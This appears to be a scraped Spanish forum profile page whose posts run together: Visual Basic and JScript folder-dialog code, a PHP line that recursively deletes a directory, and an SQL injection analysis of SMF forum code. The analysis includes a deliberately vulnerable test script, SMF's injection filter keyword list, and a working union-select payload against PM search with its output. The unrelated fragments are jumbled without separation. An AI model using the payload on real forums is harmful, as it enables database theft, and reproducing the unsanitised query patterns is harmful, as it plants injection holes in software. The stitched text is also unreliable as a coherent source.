Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Option Explicit
Private Type BrowseInfo
hWndOwner As Long
pIDLRoot As Long
pszDisplayName As Long
lpszTitle As Long
ulFlags As Long
lpfnCallback As Long
lParam As Long
iImage As Long
End Type
Private Const BIF_RETURNONLYFSDIRS = 1
Private Const MAX_PATH = 260
Private Declare Sub CoTaskMemFree Lib "ole32.dll" (ByVal hMem As Long)
Private Declare Function lstrcat Lib "kernel32" Alias "lstrcatA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long
Private Declare Function SHBrowseForFolder Lib "shell32" (lpbi As BrowseInfo) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32" (ByVal pidList As Long, ByVal lpBuffer As String) As Long
Public Function Dir_Dialogo() As String
Dim iNull As Integer, lpIDList As Long, lResult As Long
Dim sPath As String, udtBI As BrowseInfo
With udtBI
'Set the owner window
.hWndOwner = Form1.hWnd
'lstrcat appends the two strings and returns the memory address
.lpszTitle = lstrcat("Seleccione el directorio", ":")
'Return only if the user selected a directory
.ulFlags = BIF_RETURNONLYFSDIRS
End With
'Show the 'Browse for folder' dialog
lpIDList = SHBrowseForFolder(udtBI)
If lpIDList Then
sPath = String$(MAX_PATH, 0)
'Get the path from the IDList
SHGetPathFromIDList lpIDList, sPath
'free the block of memory
CoTaskMemFree lpIDList
iNull = InStr(sPath, vbNullChar)
If iNull Then
sPath = Left$(sPath, iNull - 1)
End If
End If
If Len(sPath) > 0 Then
If Not Right(sPath, 1) = "\" Then
Dir_Dialogo = sPath & "\"
Else
Dir_Dialogo = sPath
End If
End If
End Function
Private Sub Boton_Click()
Dim Directorio As String
' Establece el directorio
Directorio = Dir_Dialogo
' Verifica que haya valor, o sea que no hayan cancelado
If Len(Directorio) > 0 Then
Text.Text = Directorio
End If
End Sub
// If the query information was already packed in the URL, decode it.
// !!! Change this.
elseif ($context['sub_action'] == 'query')
$where = base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))); // Calculate the number of results.
if (empty($where) or $where == '1')
$num_members = $modSettings['totalMembers'];
else{
$request = db_query("
SELECT COUNT(*)
FROM {$db_prefix}members
WHERE $where", __FILE__, __LINE__);
list ($num_members) = mysql_fetch_row($request);
mysql_free_result($request);
}
CitarID_GROUP = 0
<?php
$inyeccion = $_GET['inyeccion'];
/* BUG */
$handle = mysql_connect('localhost', 'root', '123456');
mysql_select_db('smf', $handle);
$request = mysql_query("SELECT COUNT(*) FROM smf_members WHERE $inyeccion");
/* BUG */
if(!$request){
echo 'Error ('.mysql_errno($handle).'): '.mysql_error($handle);
}else{
while($fila = mysql_fetch_array($request, MYSQL_ASSOC)){
$retorno[] = $fila;
}
mysql_free_result($request);
print_r($retorno);
}
mysql_close($handle);
?> // If we're coming from a search, get the variables.
if (isset($_REQUEST['params'])){
$search_params = base64_decode(strtr($_REQUEST['params'], array(' ' => '+')));
$search_params = @unserialize($search_params);
// To be sure, let's slash all the elements.
foreach ($search_params as $key => $value)
$search_params[$key] = addslashes($value);
} // Count the amount of entries in total for pagination.
$result = db_query("
SELECT COUNT(*)
FROM {$db_prefix}log_actions AS lm
LEFT JOIN {$db_prefix}members AS mem ON (mem.ID_MEMBER = lm.ID_MEMBER)
LEFT JOIN {$db_prefix}membergroups AS mg ON (mg.ID_GROUP = IF(mem.ID_GROUP = 0, mem.ID_POST_GROUP, mem.ID_GROUP))" . (!empty($search_params['string']) ? "
WHERE INSTR($search_params[type_sql], '$search_params[string]')" : ''), __FILE__, __LINE__);
list ($context['entry_count']) = mysql_fetch_row($result);
mysql_free_result($result);Citara:4:{s:6:"string";s:2:"ll";s:4:"type";s:6:"member";s:8:"type_sql";s:12:"mem.realName";s:10:"type_label";s:7:"Usuario";}y nos damos cuenta que es un valor serializado por lo tanto:
<?php
$string = 'a:4:{s:6:"string";s:2:"ll";s:4:"type";s:6:"member";s:8:"type_sql";s:12:"mem.realName";s:10:"type_label";s:7:"Usuario";}';
print_r(unserialize($string));
?>CitarArray(
[string] => ll
[type] => member
[type_sql] => mem.realName
[type_label] => Usuario
)
<?php
$string = array(
"'" => "'",
'string' => "ll",
'type' => 'member',
'type_sql' => '\'mem.realName',
'type_label' => 'Usuario'
);
echo base64_encode(serialize($string));
?>
Citaradvanced|'|1|"|searchtype|'|2|"|subject_only|'||"|show_complete|'||"|userspec|'|WHK|"|sort_dir|'|desc|"|sort|'|ID_PM|"|labels|'|0,1,2,3,4,5,-1|"|search|'|sin
$temp_params = explode('|"|', base64_decode(strtr($_REQUEST['params'], array(' ' => '+')))); // Get the amount of results.
$request = db_query("
SELECT COUNT(*)
FROM ({$db_prefix}pm_recipients AS pmr, {$db_prefix}personal_messages AS pm)
WHERE pm.ID_PM = pmr.ID_PM" . ($context['folder'] == 'inbox' ? "
AND pmr.ID_MEMBER = $ID_MEMBER
AND pmr.deleted = 0" : "
AND pm.ID_MEMBER_FROM = $ID_MEMBER
AND pm.deletedBySender = 0") . "
$userQuery$labelQuery
AND ($searchQuery)", __FILE__, __LINE__);
list ($numResults) = mysql_fetch_row($request);
mysql_free_result($request); // We don't use UNION in SMF, at least so far. But it's useful for injections.
if (strpos($clean, 'union') !== false && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
$fail = true;
// Comments? We don't use comments in our queries, we leave 'em outside!
elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== false || strpos($clean, ';') !== false)
$fail = true;
// Trying to change passwords, slow us down, or something?
elseif (strpos($clean, 'sleep') !== false && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
$fail = true;
elseif (strpos($clean, 'benchmark') !== false && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)
$fail = true;
// Sub selects? We don't use those either.
elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
$fail = true;$ret = mysql_query($db_string, $db_connection); /* TEST */
if(eregi('union', $db_string)){
echo nl2br($db_string).'<br /><br />';
$ret = mysql_query($db_string, $db_connection);
echo mysql_error($db_connection); // test
while($fila = mysql_fetch_array($ret, MYSQL_ASSOC)){
foreach($fila as $variable => $valor){
echo nl2br(htmlspecialchars($variable, ENT_QUOTES).' = '.htmlspecialchars($valor, ENT_QUOTES).'<br /><br />');
}
}
//exit;
}else{
$ret = mysql_query($db_string, $db_connection);
}
/* TEST */Citaradvanced|'|1|"|searchtype|'|2|"|subject_only|'||"|show_complete|'||"|userspec|'|WHK|"|sort_dir|'|desc|"|sort|'|ID_PM|"|labels|'|0,1,2,3,4,5,-1|"|search|'|sin
Citaradvanced|'|1|"|searchtype|'|2|"|subject_only|'||"|show_complete|'||"|userspec|'|whk') or pm.fromName like "|"|sort_dir|'|desc|"|sort|'|ID_PM|"|labels|'|0,1,2,3,4,5,-1|"|search|'|"/**/union/**/select/**/database(),user()/**/-- -
SELECT COUNT(*)
FROM (smf_pm_recipients AS pmr, smf_personal_messages AS pm)
WHERE pm.ID_PM = pmr.ID_PM
AND pmr.ID_MEMBER = 2
AND pmr.deleted = 0
AND pm.ID_MEMBER_FROM = 0 AND (pm.fromName LIKE 'whk') or pm.fromName like "')
AND ((pm.subject LIKE '%"/**/union/**/select/**/database(),user()/**/--%' OR pm.body LIKE '%"/**/union/**/select/**/database(),user()/**/--%'))<br /><br />COUNT(*) = 0
SELECT pm.ID_PM, pm.ID_MEMBER_FROM
FROM (smf_pm_recipients AS pmr, smf_personal_messages AS pm)
WHERE pm.ID_PM = pmr.ID_PM
AND pmr.ID_MEMBER = 2
AND pmr.deleted = 0
AND pm.ID_MEMBER_FROM = 0 AND (pm.fromName LIKE 'whk') or pm.fromName like "')
AND ((pm.subject LIKE '%"/**/union/**/select/**/database(),user()/**/--%' OR pm.body LIKE '%"/**/union/**/select/**/database(),user()/**/--%'))
ORDER BY ID_PM desc
LIMIT 0, 30
// !!! comentario
$search_params = base64_decode(strtr($_REQUEST['params'], array(' ' => '+')));// $search_params = base64_decode(strtr($_REQUEST['params'], array(' ' => '+')));$where = base64_decode(strtr($_REQUEST['params'], array(' ' => '+')));// $where = base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))); if (isset($_REQUEST['params']))
{
$temp_params = explode('|"|', base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))));
$context['search_params'] = array();
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$context['search_params'][$k] = stripslashes($v);
}
}/*
if (isset($_REQUEST['params']))
{
$temp_params = explode('|"|', base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))));
$context['search_params'] = array();
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$context['search_params'][$k] = stripslashes($v);
}
}
*/ if (isset($_REQUEST['params']))
{
$temp_params = explode('|"|', base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))));
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$search_params[$k] = stripslashes($v);
}
}/*
if (isset($_REQUEST['params']))
{
$temp_params = explode('|"|', base64_decode(strtr($_REQUEST['params'], array(' ' => '+'))));
foreach ($temp_params as $i => $data)
{
@list ($k, $v) = explode('|\'|', $data);
$search_params[$k] = stripslashes($v);
}
}
*/
Private Type BrowseInfo
hWndOwner As Long
pIDLRoot As Long
pszDisplayName As Long
lpszTitle As Long
ulFlags As Long
lpfnCallback As Long
lParam As Long
iImage As Long
End Type
Const BIF_RETURNONLYFSDIRS = 1
Const MAX_PATH = 260
Private Declare Sub CoTaskMemFree Lib "ole32.dll" (ByVal hMem As Long)
Private Declare Function lstrcat Lib "kernel32" Alias "lstrcatA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long
Private Declare Function SHBrowseForFolder Lib "shell32" (lpbi As BrowseInfo) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32" (ByVal pidList As Long, ByVal lpBuffer As String) As Long
Private Sub Form_Load()
'KPD-Team 1998
'URL: http://www.allapi.net/
'KPDTeam@Allapi.net
Dim iNull As Integer, lpIDList As Long, lResult As Long
Dim sPath As String, udtBI As BrowseInfo
With udtBI
'Set the owner window
.hWndOwner = Me.hWnd
'lstrcat appends the two strings and returns the memory address
.lpszTitle = lstrcat("C:\", "")
'Return only if the user selected a directory
.ulFlags = BIF_RETURNONLYFSDIRS
End With
'Show the 'Browse for folder' dialog
lpIDList = SHBrowseForFolder(udtBI)
If lpIDList Then
sPath = String$(MAX_PATH, 0)
'Get the path from the IDList
SHGetPathFromIDList lpIDList, sPath
'free the block of memory
CoTaskMemFree lpIDList
iNull = InStr(sPath, vbNullChar)
If iNull Then
sPath = Left$(sPath, iNull - 1)
End If
End If
MsgBox sPath
End Sub
var objShell = new ActiveXObject("Shell.Application");
var objFolder = new Object;
objFolder = objShell.BrowseForFolder(0, "Select folder", 0,"::{20D04FE0-3AEA-1069-A2D8-08002B30309D}");
<?php
$ruta = './archivos/';
system('rm -R '.$ruta.'*');
?>